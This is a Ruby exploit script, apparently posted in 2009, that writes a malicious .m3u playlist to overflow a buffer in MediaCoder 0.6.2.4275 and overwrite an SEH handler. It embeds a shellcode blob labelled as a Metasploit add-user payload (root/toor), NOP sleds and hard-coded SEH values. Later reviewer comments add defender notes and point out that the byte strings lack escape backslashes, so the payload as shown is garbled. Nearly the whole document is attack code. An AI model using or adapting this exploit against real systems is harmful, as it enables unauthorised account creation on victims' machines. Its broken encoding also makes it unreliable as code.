
mediacoderuniversal-sehoverflow.txt

Posted on 10 March 2009

#!/usr/bin/env ruby
# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & honestly, I no longer remember who else I am forgetting :d
# Oh, I forgot: big thanks to Str0ke, and thank you for all your patience, advice and support
#
# Reviewer summary (what the visible code does):
#   * prompts on stdin for a base file name,
#   * concatenates the constant strings below into one buffer (Xpl),
#   * writes that buffer to "<name>.m3u" in the current directory.
# According to the author's title, the resulting playlist is meant to overflow
# a buffer in MediaCoder 0.6.2.4275 and overwrite a structured exception
# handler (SEH) record when the file is opened.
#
# NOTE(review): in this listing the string literals appear without escape
# backslashes, so Ruby reads them as plain ASCII text. Treat the per-line
# disassembly comments as the author's description of intent, not as something
# this listing can confirm.
#
# Defender notes:
#   * The trigger is a user opening an untrusted .m3u file in the affected
#     player; the file name is chosen by whoever runs this script, so file
#     names are not a useful indicator.
#   * The payload is labelled by its author as a Metasploit "win32_adduser"
#     stub (USER=root, PASS=toor). If that label is accurate, a successful run
#     would surface as an unexpected local account, which account-creation
#     auditing records (for example Windows Security event 4720 on current
#     Windows versions).
#   * The script relies on a hard-coded handler value (Seh). SafeSEH, SEHOP
#     and ASLR are the platform mitigations aimed at this class of technique.

# Start timestamp, printed immediately.
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
# Base name comes straight from stdin; capitalize upper-cases the first
# character and lower-cases the rest. It is used unchecked as the output path.
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.m3u'
# Captured here, before the buffer is assembled; the "finished" message at the
# end prints this value, not the actual completion time.
time1 = Time.new
# Silences Ruby interpreter warnings for the rest of the run.
$VERBOSE=nil

# Playlist preamble. Read as hex byte values, the pairs spell
# "#EXTM3U", CR LF, "#EXTINF:3:50,Lamb Of God - Set To Fail ", CR LF, "D:\",
# i.e. a normal M3U header followed by the start of a track path; everything
# appended after it in Xpl continues that path entry.
Header = "x23x45x58x54x4Dx33x55x0Dx0Ax23x45x58x54x49x4Ex46"+
  "x3Ax33x3Ax35x30x2Cx4Cx61x6Dx62x20x4Fx66x20x47x6F"+
  "x64x20x2Dx20x53x65x74x20x54x6Fx20x46x61x69x6Cx20"+
  "x0Dx0Ax44x3Ax5C"

# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
# (Author's label for the blob below; its contents are not verified here.)
Shellscode =
  "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
  "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
  "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
  "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
  "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
  "x42x50x42x30x42x30x4bx38x45x54x4ex33x4bx38x4ex47"+
  "x45x30x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx48"+
  "x4fx35x42x32x41x50x4bx4ex49x54x4bx58x46x53x4bx58"+
  "x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c"+
  "x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
  "x46x4fx4bx33x46x45x46x42x46x50x45x57x45x4ex4bx48"+
  "x4fx55x46x42x41x30x4bx4ex48x56x4bx48x4ex50x4bx34"+
  "x4bx48x4fx35x4ex31x41x30x4bx4ex4bx48x4ex41x4bx58"+
  "x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53"+
  "x42x4cx46x36x4bx38x42x44x42x53x45x38x42x4cx4ax57"+
  "x4ex50x4bx38x42x54x4ex50x4bx58x42x57x4ex41x4dx4a"+
  "x4bx38x4ax56x4ax30x4bx4ex49x30x4bx48x42x58x42x4b"+
  "x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx35x41x53"+
  "x48x4fx42x46x48x55x49x48x4ax4fx43x48x42x4cx4bx37"+
  "x42x55x4ax56x42x4fx4cx58x46x50x4fx45x4ax36x4ax39"+
  "x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x4dx46"+
  "x46x56x50x52x45x36x4ax47x45x46x42x52x4fx32x43x46"+
  "x42x52x50x56x45x56x46x37x42x52x45x57x43x57x45x46"+
  "x44x37x42x32x44x47x4fx46x4fx56x46x37x42x32x46x37"+
  "x4fx36x4fx56x44x57x42x52x4fx42x41x44x46x54x46x34"+
  "x42x52x48x52x48x52x42x32x50x56x45x36x46x37x42x52"+
  "x4ex36x4fx46x43x56x41x56x4ex36x47x36x44x57x4fx36"+
  "x45x57x42x47x42x52x41x34x46x46x4dx36x49x46x50x56"+
  "x49x36x43x47x46x47x44x37x41x36x46x57x4fx56x44x57"+
  "x43x47x42x32x44x57x4fx56x4fx46x46x47x42x32x4fx32"+
  "x41x54x46x54x46x54x42x50x5a"

# Media_bruteforcer_shellcode
# A short prefix followed by a second copy of Shellscode; the author describes
# it as a fallback in case the first copy does not run.
Bruteforce = # Fallback that retries the shellcode if the first method does not work
  "xD0x62x43"+ # SHL BYTE PTR DS:[EDX+43],1
  "x00xB8x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH
  "xBBxABx01"+
  "x00x00"+ # ADD BYTE PTR DS:[EAX],AL
  "x00xF0"+ # ADD AL,DH
  "xFFx13"+ # CALL DWORD PTR DS:[EBX]
  "x00x4Fx6D"+ # ADD BYTE PTR DS:[EDI+6D],CL
  "x81x7Cx38x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
  "x92x7CxFF"+
  "xFFxFF" + Shellscode

# Second hand-written stub; the per-line mnemonics are the author's.
Rhunter =
  "x5B"+ #POP EBX
  "x90" * 10 + # NOP x 10
  "x90x90"+ # NOP NOP
  "x8Dx44xC1x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
  "x8Bx1E"+ # MOV EBX,DWORD PTR DS:[ESI]
  "x89x18"+ # MOV DWORD PTR DS:[EAX],EBX
  "x89x06"+ # MOV DWORD PTR DS:[ESI],EAX
  "x42"+ # INC EDX
  "x83xFAx64"+ # CMP EDX,64
  "x75xEC"+ # JNZ SHORT dsp_chmx.0169127E
  "x8Bx06"+ # MOV EAX,DWORD PTR DS:[ESI]
  "x8Bx10"+ # MOV EDX,DWORD PTR DS:[EAX]
  "x89x16"+ # MOV DWORD PTR DS:[ESI],EDX
  "x5E"+ # POP ESI
  "x5B"+ # POP EBX
  "x93x43"+ # CALL ESP
  "x92x7c"

# Filler placed directly after the header: repeated filler characters with a
# few fixed values in between.
Over = "x41" * 195 + "xffxffxffxff" + "x47" * 4 + "x42" * 6 + "xffxffx47x47x47xFFx65x78x77x76"
# Padding strings; by the author's naming these are NOP runs.
Nop = "x90" * 8
# Presumably the two values intended to land on the overwritten exception
# registration record ("next" pointer and handler) — inferred from the names.
# Seh is a fixed, hard-coded value.
Next_Seh = "xebx06xffxff"
Seh = "x93xB6x98x7C"
Nopsled = "x90" * 7

# Final buffer, in the order it is written to the file.
Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled

# Creates (or truncates) "<name>.m3u" and writes the buffer; puts appends a
# trailing newline because Xpl does not end with one.
File.open( files+".m3u", "w" ) do |the_file|
  the_file.puts(Xpl)
  puts "Exploit finished in Current Time :" + time1.inspect
  puts "Now Open " + files +".m3u :d"
end

 
